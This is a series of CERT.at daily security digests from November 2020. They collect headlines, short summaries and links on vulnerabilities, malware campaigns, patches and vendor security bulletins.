∗∗∗ Western Digital My Cloud NAS Devices Security Vulnerabilities ∗∗∗
---------------------------------------------
Comparitech researchers have published a paper on five vulnerabilities found in Western Digital network-attached storage (NAS) devices. If successfully exploited, these vulnerabilities could lead to remote code execution. Also possible is the [...]
---------------------------------------------
https://exchange.xforce.ibmcloud.com/collection/2ee337a7fbea5d145289bcab311…
∗∗∗ Security updates for Tuesday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (libdatetime-timezone-perl, openldap, pacemaker, and restic), Fedora (libmediainfo, mediainfo, mingw-python3, and seamonkey), Gentoo (libexif), openSUSE (raptor), Oracle (kernel and microcode_ctl), Scientific Linux (firefox), SUSE (kernel-firmware, postgresql, postgresql96, postgresql10 and postgresql12, and raptor), and Ubuntu (openldap and postgresql-10, postgresql-12, postgresql-9.5).
---------------------------------------------
https://lwn.net/Articles/837538/
∗∗∗ Security Bulletin: IBM Maximo Asset Management is vulnerable to Multiple Jackson-Databind CVEs – February 2020 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-maximo-asset-manageme…
∗∗∗ Security Bulletin: Cross-site scripting vulnerability affects IBM Business Automation Workflow – CVE-2020-4672 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-cross-site-scripting-vuln…
∗∗∗ Security Bulletin: IBM API Connect is vulnerable to arbitrary code execution and security bypass in Drupal (CVE-2020-13664, CVE-2020-13665) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-api-connect-is-vulner…
=====================
= End-of-Day report =
=====================
Timeframe: Freitag 13-11-2020 18:00 − Montag 16-11-2020 18:00
Handler: Stephan Richter
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Stories from the SOC – Multi-layered defense detects Windows Trojan ∗∗∗
---------------------------------------------
Malware infections are common and are often missed by antivirus software. Their impact on critical infrastructure and applications can be devastating to an organization's network, brand and customers if not remediated. With the ever-changing nature of [...]
---------------------------------------------
https://cybersecurity.att.com/blogs/security-essentials/stories-from-the-so…
∗∗∗ New TroubleGrabber Discord malware steals passwords, system info ∗∗∗
---------------------------------------------
TroubleGrabber, a new credential stealer discovered by Netskope security researchers, spreads via Discord attachments and uses Discord webhooks to deliver stolen information to its operators.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/new-troublegrabber-discord-m…
∗∗∗ Windows Kerberos authentication breaks due to security updates ∗∗∗
---------------------------------------------
Microsoft is investigating a new known issue causing enterprise domain controllers to experience Kerberos authentication problems after installing the security updates released during this month's Patch Tuesday, on November 10.
---------------------------------------------
https://www.bleepingcomputer.com/news/microsoft/windows-kerberos-authentica…
∗∗∗ Schneider Electric Warns Customers of Drovorub Linux Malware ∗∗∗
---------------------------------------------
One of the security bulletins released this week by Schneider Electric warns customers about Drovorub, a piece of Linux malware that was recently detailed by the NSA and the FBI.
---------------------------------------------
https://www.securityweek.com/schneider-electric-warns-customers-drovorub-li…
∗∗∗ Ok Google: please publish your DKIM secret keys ∗∗∗
---------------------------------------------
The Internet is a dangerous place in the best of times. Sometimes Internet engineers find ways to mitigate the worst of these threats, and sometimes they fail. Every now and then, however, a major Internet company finds a solution that actually makes the situation worse for just about everyone. Today I want to talk about [...]
---------------------------------------------
https://blog.cryptographyengineering.com/2020/11/16/ok-google-please-publis…
∗∗∗ The ransomware landscape is more crowded than you think ∗∗∗
---------------------------------------------
More than 25 Ransomware-as-a-Service (RaaS) portals are currently renting ransomware to other criminal groups.
---------------------------------------------
https://www.zdnet.com/article/the-ransomware-landscape-is-more-crowded-than…
∗∗∗ Ngioweb Botnet Targeting IoT Devices ∗∗∗
---------------------------------------------
A new version of the Ngioweb botnet malware was discovered and analyzed by Netlab 360 researchers. Their blog post details the changes observed in these newer samples.
---------------------------------------------
https://exchange.xforce.ibmcloud.com/collection/e4becb0bc47fb9b7ad74c9fb579…
=====================
= Vulnerabilities =
=====================
∗∗∗ Heartbleed, BlueKeep and other vulnerabilities that didn't disappear just because we don't talk about them anymore, (Mon, Nov 16th) ∗∗∗
---------------------------------------------
Since new critical vulnerabilities are discovered and published nearly every day, it is no wonder that we (i.e. security professionals and security-oriented media) tend to focus on these and don't return to the ones that came before very often. Unless there is a massive exploitation campaign, that is. This doesn't present any problems for organizations that manage to patch vulnerabilities on time, but for many others [...]
---------------------------------------------
https://isc.sans.edu/diary/rss/26798
∗∗∗ Security updates for Monday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (libdatetime-timezone-perl and libvncserver), Fedora (chromium, kernel, kernel-headers, kernel-tools, krb5, libexif, libxml2, and thunderbird), Gentoo (chromium, libmaxminddb, and mit-krb5), Mageia (arpwatch, bluez, chromium-browser-stable, firefox and thunderbird, golang, java-1.8.0-op, kdeconnect-kde, kleopatra, libexif, lilypond, microcode, packagekit, ruby, and tpm2-tss), openSUSE (chromium, firefox, ImageMagick, kernel, openldap2, python-waitress, SDL, u-boot, ucode-intel, and zeromq), Oracle (fence-agents, firefox, freetype, kernel, python, python3, and thunderbird), Red Hat (rh-postgresql10-postgresql, rh-postgresql12-postgresql, and virt:8.2 and virt-devel:8.2), Slackware (seamonkey), and SUSE (firefox, gdm, kernel, and kernel-firmware).
---------------------------------------------
https://lwn.net/Articles/837431/
∗∗∗ SIGE (Joomla) 3.4.1 & 3.5.3 Pro - Multiple Vulnerabilities ∗∗∗
---------------------------------------------
https://cxsecurity.com/issue/WLB-2020110113
∗∗∗ Opera Touch for iOS: Vulnerability allows display of false information ∗∗∗
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-1123
∗∗∗ Nagios Enterprises Nagios XI: Multiple vulnerabilities ∗∗∗
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-1122
∗∗∗ Security Bulletin: Information Disclosure Vulnerability Affects EBICS Client of IBM Sterling B2B Integrator (CVE-2020-4475) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-information-disclosure-vu…
∗∗∗ Security Bulletin: Information Disclosure Vulnerability Affects IBM Sterling File Gateway (CVE-2020-4476) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-information-disclosure-vu…
∗∗∗ Security Bulletin: CKEditor XSS Vulnerability Affects IBM Sterling B2B Integrator (CVE-2018-17960) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ckeditor-xss-vulnerabilit…
∗∗∗ Security Bulletin: XSS Vulnerability Affects IBM Sterling B2B Integrator (CVE-2020-4705) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-xss-vulnerability-affects…
∗∗∗ Security Bulletin: SQL Injection Vulnerability Affects EBICS in IBM Sterling B2B Integrator (CVE-2020-4655) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-sql-injection-vulnerabili…
∗∗∗ Security Bulletin: B2B API Information Disclosure Vulnerability Affects IBM Sterling B2B Integrator (CVE-2020-4566) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-b2b-api-information-discl…
∗∗∗ Security Bulletin: Cross-site scripting vulnerability affects IBM Business Automation Workflow – CVE-2020-4672 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-cross-site-scripting-vuln…
∗∗∗ Security Bulletin: Multiple Security Vulnerabilities in Apache Struts Affect IBM Sterling File Gateway (CVE-2019-0233, CVE-2019-0230) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-security-vulnera…
∗∗∗ Security Bulletin: Cookie Vulnerability Affects IBM Sterling File Gateway (CVE-2020-4763) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-cookie-vulnerability-affe…
∗∗∗ Security Bulletin: Cookie Vulnerability Affects IBM Sterling File Gateway (CVE-2020-4665) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-cookie-vulnerability-affe…
=====================
= End-of-Day report =
=====================
Timeframe: Donnerstag 12-11-2020 18:00 − Freitag 13-11-2020 18:00
Handler: Dimitri Robl
Co-Handler: Stephan Richter
=====================
= News =
=====================
∗∗∗ Ubuntu Linux closes gaps: Becoming system administrator in no time ∗∗∗
---------------------------------------------
A security researcher stumbled upon a combination of flaws that let ordinary users create an account with sudo rights. Ubuntu has now fixed them.
---------------------------------------------
https://heise.de/-4960051
∗∗∗ Unbreak My Heart: What I Learned About Building Better Medical Devices While Troubleshooting My Pacemaker ∗∗∗
---------------------------------------------
This blog outlines the story of Veronica Schmitt's journey to fixing her ICD/pacemaker using medical device forensics.
---------------------------------------------
https://www.sans.org/blog/unbreak-my-heart-what-i-learned-about-building-be…
∗∗∗ A new skimmer uses WebSockets and a fake credit card form to steal sensitive data ∗∗∗
---------------------------------------------
A new skimmer attack was discovered this week, targeting various online e-commerce sites built with different frameworks. As of the writing of this blog post, the attack is still active and exfiltrating data.
---------------------------------------------
https://blogs.akamai.com/2020/11/a-new-skimmer-uses-websockets-and-a-fake-c…
∗∗∗ DNS Cache Poisoning Attack Reloaded: Revolutions with Side Channels ∗∗∗
---------------------------------------------
SAD DNS is a revival of the classic DNS cache poisoning attack (which has not worked since 2008) leveraging novel network side channels that exist in all modern operating systems, including Linux, Windows, macOS, and FreeBSD. This represents an important milestone: the first weaponizable network side channel attack with serious security impact. The attack allows an off-path attacker to inject a malicious DNS record into a DNS cache (e.g., in BIND, Unbound, dnsmasq).
---------------------------------------------
https://www.saddns.net/
∗∗∗ Surviving college distance learning during the pandemic: a cybersecurity guide ∗∗∗
---------------------------------------------
Students in higher education are exposed to online risks more than ever. Keep yourself secure while distance learning from home with this practical guide.
---------------------------------------------
https://blog.malwarebytes.com/how-tos-2/2020/11/surviving-college-distance-…
=====================
= Vulnerabilities =
=====================
∗∗∗ Schneider Electric secures various ICS components against vulnerabilities ∗∗∗
---------------------------------------------
Important security updates are available for Schneider Electric hardware and software used to configure and manage industrial control systems.
---------------------------------------------
https://heise.de/-4959299
∗∗∗ ICS Advisory (ICSA-20-317-01) Mitsubishi Electric MELSEC iQ-R Series ∗∗∗
---------------------------------------------
A denial-of-service vulnerability due to uncontrolled resource consumption exists in MELSEC iQ-R series CPU modules. This vulnerability does not affect products when the "To Use or Not to Use Web Server" parameter of CPU modules is set to "Not Use." The default setting is "Not Use."
---------------------------------------------
https://us-cert.cisa.gov/ics/advisories/icsa-20-317-01
∗∗∗ PostgreSQL 13.1, 12.5, 11.10, 10.15, 9.6.20, and 9.5.24 Released! ∗∗∗
---------------------------------------------
The PostgreSQL Global Development Group has released an update to all supported versions of our database system, including 13.1, 12.5, 11.10, 10.15, 9.6.20, and 9.5.24. This release closes three security vulnerabilities and fixes over 65 bugs reported over the last three months.
Due to the nature of CVE-2020-25695, we advise you to update as soon as possible.
Additionally, this is the second-to-last release of PostgreSQL 9.5. If you are running PostgreSQL 9.5 in a production environment, we [...]
---------------------------------------------
https://www.postgresql.org/about/news/postgresql-131-125-1110-1015-9620-and…
∗∗∗ Security updates for Friday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (libproxy, pacemaker, and thunderbird), Fedora (nss), openSUSE (kernel), Oracle (curl, librepo, qt and qt5-qtbase, and tomcat), Red Hat (firefox), SUSE (firefox, java-1_7_0-openjdk, and openldap2), and Ubuntu (apport, libmaxminddb, openjdk-8, openjdk-lts, and slirp).
---------------------------------------------
https://lwn.net/Articles/837105/
∗∗∗ Citrix Hypervisor Security Update ∗∗∗
---------------------------------------------
A security issue has been identified in Citrix Hypervisor that may allow privileged code running in a guest VM to infer details of some computations occurring in other VMs on the host. This may, for example, be used to infer a secret encryption key used [...]
---------------------------------------------
https://support.citrix.com/article/CTX285937
∗∗∗ Citrix SDWAN Center Security Update ∗∗∗
---------------------------------------------
Multiple vulnerabilities have been discovered in Citrix SD-WAN Center that, if exploited, could allow an unauthenticated attacker with network access to SD-WAN Center to perform arbitrary code execution as root.
---------------------------------------------
https://support.citrix.com/article/CTX285061
∗∗∗ Security Bulletin: App Connect Enterprise Certified Container Designer instances may be vulnerable to CVE-2020-7760 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-app-connect-enterprise-ce…
∗∗∗ Security Bulletin: Novalink is impacted by Vulnerability in Hibernate Validator affects WebSphere Application Server Liberty (CVE-2020-10693) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-novalink-is-impacted-by-v…
∗∗∗ Security Bulletin: Novalink is impacted running oauth-2.0 or openidConnectServer-1.0 server features vulnerability in WebSphere Application Server Liberty (CVE-2020-4590) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-novalink-is-impacted-runn…
∗∗∗ Security Bulletin: Vulnerability in icu CVE-2020-10531. ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-icu-cve-…
∗∗∗ Security Bulletin: Vulnerability in Open Source Python affects IBM Tivoli Application Dependency Discovery Manager (CVE-2020-8492) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-open-sou…
∗∗∗ Security Bulletin: Vulnerabilities in IBM Java SDK affecting IBM Application Discovery and Delivery Intelligence V5.1.0.7 and V5.1.0.8 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-ibm-ja…
∗∗∗ Security Bulletin: Vulnerabilities in Tivoli Netcool/OMNIbus ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-tivoli…
∗∗∗ Security Bulletin: Vulnerability in OpenSSL affects IBM Integrated Analytics System ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-openssl-…
∗∗∗ Security Bulletin: Samba for IBM i is affected by CVE-2020-14323 and CVE-2020-14318 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-samba-for-ibm-i-is-affect…
∗∗∗ Security Bulletin: Vulnerabilities in Node.js affect IBM Spectrum Control (CVE-2020-8201, CVE-2020-8252) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-node-j…
∗∗∗ Security Bulletin: CVE-2020-4482 ADD SNAPSHOT STATUS REST CALL DOESN'T CHECK THE USER ROLE ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-cve-2020-4482-add-snapsho…
∗∗∗ Security Bulletin: Apache Struts (Publicly disclosed vulnerability) affects Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-apache-struts-publicly-di…
∗∗∗ Security Bulletin: CVE-2018-10886 ant before version 1.9.12 unzip and untar targets allow the extraction of files outside the target directory. ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-cve-2018-10886-ant-before…
∗∗∗ Security Bulletin: IBM Security Directory Suite is affected by a security vulnerability (CVE-2018-4441) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-directory-su…
∗∗∗ Security Bulletin: IBM Security Guardium Insights is affected by IBM SDK, Java Technology Edition Quarterly CPU – Apr 2020 vulnerabilities ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-ins…
∗∗∗ Security Bulletin: IBM Content Navigator is affected by a vulnerability in Apache HttpClient (CVE-2020-13956) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletinsecurity-bulletin-ibm-cont…
∗∗∗ Security Bulletin: A vulnerability in Ruby on Rails affects IBM License Metric Tool v9 (CVE-2019-16779). ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-ruby-o…
∗∗∗ macOS Big Sur 11.0.1 ∗∗∗
---------------------------------------------
https://support.apple.com/kb/HT211931
∗∗∗ Security Update 2020-006 High Sierra, Security Update 2020-006 Mojave ∗∗∗
---------------------------------------------
https://support.apple.com/kb/HT211946
∗∗∗ Safari 14.0.1 ∗∗∗
---------------------------------------------
https://support.apple.com/kb/HT211934
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily
=====================
= End-of-Day report =
=====================
Timeframe: Wednesday 11-11-2020 18:00 − Thursday 12-11-2020 18:00
Handler: Dimitri Robl
Co-Handler: Stephan Richter
=====================
= News =
=====================
∗∗∗ Source code of the exploit toolkit Cobalt Strike allegedly leaked ∗∗∗
---------------------------------------------
For almost two weeks a repository named CobaltStrike has been available on GitHub. It allegedly contains the code of Cobalt Strike 4.0. The author has also removed the licence check, which suggests a cracked version.
---------------------------------------------
https://www.zdnet.de/88389725/angeblich-quellcode-des-exploit-toolkits-coba…
∗∗∗ Hungry for data – ModPipe backdoor threatens POS software in the hospitality sector ∗∗∗
---------------------------------------------
The backdoor's authors apparently have extensive knowledge of the software and decrypt database passwords from Windows registry values.
---------------------------------------------
https://www.welivesecurity.com/deutsch/2020/11/12/hungrig-nach-daten-modpip…
∗∗∗ Extrapolating Adversary Intent Through Infrastructure ∗∗∗
---------------------------------------------
Hear from Senior Security Researcher Joe Slowik to discover the significance behind domain name patterns and learn how defenders can use these thematic insights to further their security operations.
---------------------------------------------
https://www.domaintools.com/resources/blog/extrapolating-adversary-intent-t…
∗∗∗ 2 More Google Chrome Zero-Days Under Active Exploitation ∗∗∗
---------------------------------------------
Browser users are once again being asked to patch severe vulnerabilities that can lead to remote code execution.
---------------------------------------------
https://threatpost.com/2-zero-day-bugs-google-chrome/161160/
∗∗∗ Preventing Exposed Azure Blob Storage, (Thu, Nov 12th) ∗∗∗
---------------------------------------------
In the previous diary, I explained the three public access levels of Azure Blob Storage, and how to investigate the setup for any issues. Until a couple of months ago, there was no reliable way to prevent the problem from occurring in the first place, but thankfully, Microsoft has finally seen the light.
---------------------------------------------
https://isc.sans.edu/diary/rss/26786
∗∗∗ Attacking SCADA Part II: Vulnerabilities in Schneider Electric EcoStruxure Machine Expert and M221 PLC ∗∗∗
---------------------------------------------
We present two vulnerabilities in EcoStruxure Machine Expert v1.0 and Schneider Electric M221 (Firmware 1.10.2.2) Programmable Logic Controller (PLC). All three vulnerabilities were disclosed to Schneider Electric and the details were released on 10 November 2020.
---------------------------------------------
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/attacking-s…
∗∗∗ Exploring the Exploitability of "Bad Neighbor": The Recent ICMPv6 Vulnerability (CVE-2020-16898) ∗∗∗
---------------------------------------------
We wanted to find out whether something else could be done with this vulnerability, aside from triggering the buffer overflow and causing a blue screen (BSOD)
---------------------------------------------
https://blog.zecops.com/vulnerabilities/exploring-the-exploitability-of-bad…
∗∗∗ CRAT wants to plunder your endpoints ∗∗∗
---------------------------------------------
Cisco Talos has observed a new version of a remote access trojan (RAT) family known as CRAT. Apart from the prebuilt RAT capabilities, the malware can download and deploy additional malicious plugins on the infected endpoint. One of the plugins is a ransomware known as "Hansom."
---------------------------------------------
https://blog.talosintelligence.com/2020/11/crat-and-plugins.html
∗∗∗ Avionics Safety and Secured Connectivity: A Look at DO-326A/ED-202A, DO-355 and DO-356 ∗∗∗
---------------------------------------------
One of the major improvements that the avionics industry is undergoing is an Internet of Things (IoT) upgrade. And this is inevitably affecting how airlines approach aircraft safety. From the beginning, safety has been paramount to the aviation industry. But while it is a welcome innovation, the incorporation of IoT devices in aircraft comes with [...]
---------------------------------------------
https://www.tripwire.com/state-of-security/regulatory-compliance/avionics-s…
∗∗∗ Comodo open-sources its EDR solution ∗∗∗
---------------------------------------------
OpenEDR, announced in September, is available on GitHub starting this week.
---------------------------------------------
https://www.zdnet.com/article/comodo-open-sources-its-edr-solution/
∗∗∗ Why you should keep your Netflix password to yourself ∗∗∗
---------------------------------------------
Sharing is caring - except when it isn't. Here’s why you shouldn't share your password for online media services with other people.
---------------------------------------------
https://www.welivesecurity.com/2020/11/11/why-you-should-keep-netflix-passw…
∗∗∗ Cryptominers Exploiting Weblogic RCE CVE-2020-14882 ∗∗∗
---------------------------------------------
Towards the end of October, we started seeing attackers take advantage of a Weblogic RCE vulnerability (CVE-2020-14882). Recently, SANS ISC talked about this vulnerability being exploited in the wild, [...]
---------------------------------------------
https://thedfirreport.com/2020/11/12/cryptominers-exploiting-weblogic-rce-c…
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Thursday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (codemirror-js, firefox-esr, and pacemaker), Fedora (firefox, java-latest-openjdk, and xen), openSUSE (sddm), Oracle (bind, curl, fence-agents, kernel, librepo, libvirt, python3, qt and qt5-qtbase, and tomcat), SUSE (firefox), and Ubuntu (intel-microcode, openldap, and raptor2).
---------------------------------------------
https://lwn.net/Articles/836994/
∗∗∗ Encryption Vulnerabilities Allow Hackers to Take Control of Schneider Electric PLCs ∗∗∗
---------------------------------------------
Schneider Electric this week released advisories for vulnerabilities impacting various products, including flaws that can be exploited to take control of Modicon M221 programmable logic controllers (PLCs).
---------------------------------------------
https://www.securityweek.com/encryption-vulnerabilities-allow-hackers-take-…
∗∗∗ Security Advisory - Denial of Service Vulnerability in Some Huawei Products ∗∗∗
---------------------------------------------
https://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20201111…
∗∗∗ Security Bulletin: IBM API Connect V5 is vulnerable to denial of service (CVE-2019-11479) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-api-connect-v5-is-vul…
∗∗∗ Security Bulletin: Vulnerability in HTTPD affects IBM Integrated Analytics System ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-httpd-af…
=====================
= End-of-Day report =
=====================
Timeframe: Tuesday 10-11-2020 18:00 − Wednesday 11-11-2020 18:00
Handler: Dimitri Robl
Co-Handler: Thomas Pribitzer
=====================
= News =
=====================
∗∗∗ Targeted ransomware: it’s not just about encrypting your data! ∗∗∗
---------------------------------------------
When we talk about ransomware, we need to draw a line between what it used to be and what it currently is. Why? Because nowadays ransomware is not just about encrypting data – it’s primarily about data exfiltration.
---------------------------------------------
https://securelist.com/targeted-ransomware-encrypting-data/99255/
∗∗∗ Decrypting OpenSSH sessions for fun and profit ∗∗∗
---------------------------------------------
A while ago we had a forensics case in which a Linux server was compromised and a modified OpenSSH binary was loaded into the memory of a webserver. The modified OpenSSH binary was used as a backdoor to the system for the attackers.
---------------------------------------------
https://blog.fox-it.com/2020/11/11/decrypting-openssh-sessions-for-fun-and-…
∗∗∗ How to buy Christmas presents safely online! ∗∗∗
---------------------------------------------
So that the anticipation of Christmas is not spoiled by an order from a fake shop, we show you the key points by which you can recognise dubious online shops.
---------------------------------------------
https://www.watchlist-internet.at/news/so-kaufen-sie-weihnachtsgeschenke-si…
∗∗∗ Play Store identified as main distribution vector for most Android malware ∗∗∗
---------------------------------------------
Mammoth research project using Symantec (now NortonLifeLock) telemetry confirms what everyone suspected.
---------------------------------------------
https://www.zdnet.com/article/play-store-identified-as-main-distribution-ve…
∗∗∗ New Android trojan spies on 153 mobile applications ∗∗∗
---------------------------------------------
Among them are four apps of German banks. It is distributed via links in spam e-mails. Using Android's accessibility services, the trojan establishes itself permanently on a device and allows it to be controlled remotely.
---------------------------------------------
https://www.zdnet.de/88389654/neuer-android-trojaner-spioniert-153-mobile-a…
=====================
= Vulnerabilities =
=====================
∗∗∗ NVIDIA fixes severe flaw in GeForce NOW cloud gaming service ∗∗∗
---------------------------------------------
NVIDIA released a security update for the GeForce Now cloud gaming Windows app to address a vulnerability that could allow attackers to execute arbitrary code or escalate privileges on systems running unpatched software.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/nvidia-fixes-severe-flaw-in-…
∗∗∗ VU#231329: Replay Protected Memory Block (RPMB) protocol does not adequately defend against replay attacks ∗∗∗
---------------------------------------------
The Replay Protected Memory Block (RPMB) protocol found in several storage specifications does not securely protect against replay attacks. An attacker with physical access can deceive a trusted component about the status of an RPMB write command or the content of an RPMB area.
---------------------------------------------
https://kb.cert.org/vuls/id/231329
∗∗∗ VU#760767: Macrium Reflect is vulnerable to privilege escalation due to OPENSSLDIR location ∗∗∗
---------------------------------------------
Macrium Reflect contains a privilege escalation vulnerability due to the use of an OPENSSLDIR variable that specifies a location where an unprivileged Windows user can create files.
---------------------------------------------
https://kb.cert.org/vuls/id/760767
∗∗∗ Security updates for Wednesday ∗∗∗
---------------------------------------------
Security updates have been issued by Arch Linux (chromium, firefox, gdm, linux-hardened, matrix-synapse, salt, sddm, and wordpress), Debian (firefox-esr, libmaxminddb, and moin), Fedora (cifs-utils, firefox, galera, java-latest-openjdk, mariadb, mariadb-connector-c, and wordpress), Gentoo (blueman, chromium, firefox, mariadb, qemu, salt, tmux, and wireshark), openSUSE (sddm), Oracle (kernel), Red Hat (kernel-alt, microcode_ctl, and rh-nodejs12-nodejs), SUSE (kernel, microcode_ctl, openldap2,
---------------------------------------------
https://lwn.net/Articles/836897/
∗∗∗ Patchday: Microsoft closes kernel vulnerability in Windows ∗∗∗
---------------------------------------------
More than 100 security updates for Microsoft Office, Windows and other products have been released. One vulnerability is currently being actively exploited by attackers.
---------------------------------------------
https://heise.de/-4954195
∗∗∗ Security Advisory - Command Injection Vulnerability in Some Huawei Products ∗∗∗
---------------------------------------------
http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20201111-…
∗∗∗ XSA-351 ∗∗∗
---------------------------------------------
https://xenbits.xen.org/xsa/advisory-351.html
∗∗∗ Citrix Systems Virtual Apps and Desktops: Multiple vulnerabilities allow gaining administrator privileges ∗∗∗
---------------------------------------------
http://www.cert-bund.de/advisoryshort/CB-K20-1107
=====================
= End-of-Day report =
=====================
Timeframe: Monday 09-11-2020 18:00 − Tuesday 10-11-2020 18:00
Handler: Dimitri Robl
Co-Handler: Stephan Richter
=====================
= News =
=====================
∗∗∗ PLATYPUS - With Great Power comes Great Leakage ∗∗∗
---------------------------------------------
With PLATYPUS, we present novel software-based power side-channel attacks on Intel server, desktop and laptop CPUs. We exploit the unprivileged access to the Intel RAPL interface exposing the processors power consumption to infer data and extract cryptographic keys.
---------------------------------------------
https://platypusattack.com/
∗∗∗ wetransfer.com: How to use the free service safely ∗∗∗
---------------------------------------------
wetransfer.com is a popular service for sharing many files or folders free of charge and without hassle. However, we advise caution when receiving an e-mail from wetransfer.com, because criminals send phishing e-mails or dangerous e-mails carrying malware in the design of the file transfer service. So: check first, then click!
---------------------------------------------
https://www.watchlist-internet.at/news/wetransfercom-so-nutzen-sie-den-kost…
∗∗∗ Sudden discontinuation: Avira to discontinue business security products at the end of 2021 ∗∗∗
---------------------------------------------
Avira is currently notifying business customers of the shutdown of its B2B division: existing licences will accordingly lose their validity on 01.01.22.
---------------------------------------------
https://heise.de/-4952577
∗∗∗ Microsoft Teams Users Under Attack in 'FakeUpdates' Malware Campaign ∗∗∗
---------------------------------------------
Microsoft warns that cybercriminals are using Cobalt Strike to infect entire networks beyond the infection point, according to a report.
---------------------------------------------
https://threatpost.com/microsoft-teams-fakeupdates-malware/161071/
∗∗∗ Code Comments Reveal SCP-173 Malware ∗∗∗
---------------------------------------------
We sometimes find malware code injections that contain strange code comments, which are normally used by programmers to annotate a section of code - for example, a short description of a feature or functionality for other developers to reference. Oftentimes, hackers aren’t interested in leaving comments describing how their injected malware works. Instead, they use code comments to add unique identifiers to reference aliases, quotes, threat groups, or sometimes even memes.
---------------------------------------------
https://blog.sucuri.net/2020/11/code-comments-reveal-scp-173-malware.html
∗∗∗ WOW64!Hooks: WOW64 Subsystem Internals and Hooking Techniques ∗∗∗
---------------------------------------------
Microsoft is known for their backwards compatibility. When they rolled out the 64-bit variant of Windows years ago they needed to provide compatibility with existing 32-bit applications. In order to provide seamless execution regardless of application bitness, the WoW (Windows on Windows) system was coined. This layer, which will be referred to as 'WOW64' from here on out, is responsible for translating all Windows API calls from 32-bit userspace to the 64-bit operating system
---------------------------------------------
https://www.fireeye.com/blog/threat-research/2020/11/wow64-subsystem-intern…
∗∗∗ Snakes and Ladder Logic ∗∗∗
---------------------------------------------
A click to a reverse shell in OpenPLC and ladder logic OR Why you shouldn’t run everything as root in PLC and RTUs.
---------------------------------------------
https://www.pentestpartners.com/security-blog/snakes-and-ladder-logic/
∗∗∗ Npm package caught stealing sensitive Discord and browser files ∗∗∗
---------------------------------------------
Malicious code was found hidden inside a JavaScript library named Discord.dll.
---------------------------------------------
https://www.zdnet.com/article/npm-package-caught-stealing-sensitive-discord…
∗∗∗ IoT security is a mess. These guidelines could help fix that ∗∗∗
---------------------------------------------
New guidelines from ENISA recommend that all stages of the IoT device lifecycle need to be considered to help ensure devices are secure.
---------------------------------------------
https://www.zdnet.com/article/iot-security-is-a-mess-these-guidelines-could…
=====================
= Vulnerabilities =
=====================
∗∗∗ Security update: Ultimate Member plug-in endangers WordPress sites ∗∗∗
---------------------------------------------
Admin vulnerabilities in the Ultimate Member plug-in threaten more than 100,000 WordPress websites. A fixed version is available.
---------------------------------------------
https://heise.de/-4952685
∗∗∗ Remote code execution vulnerability in Firefox, Firefox ESR and Thunderbird ∗∗∗
---------------------------------------------
Mozilla has closed a critical vulnerability in its web browsers and its mail client.
---------------------------------------------
https://heise.de/-4953356
∗∗∗ SAP Patchday November 2020 ∗∗∗
---------------------------------------------
A remote, authenticated or anonymous attacker can exploit multiple vulnerabilities in SAP products and application components to compromise the confidentiality, availability and integrity of the applications.
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-1090
∗∗∗ Security Bulletins Posted ∗∗∗
---------------------------------------------
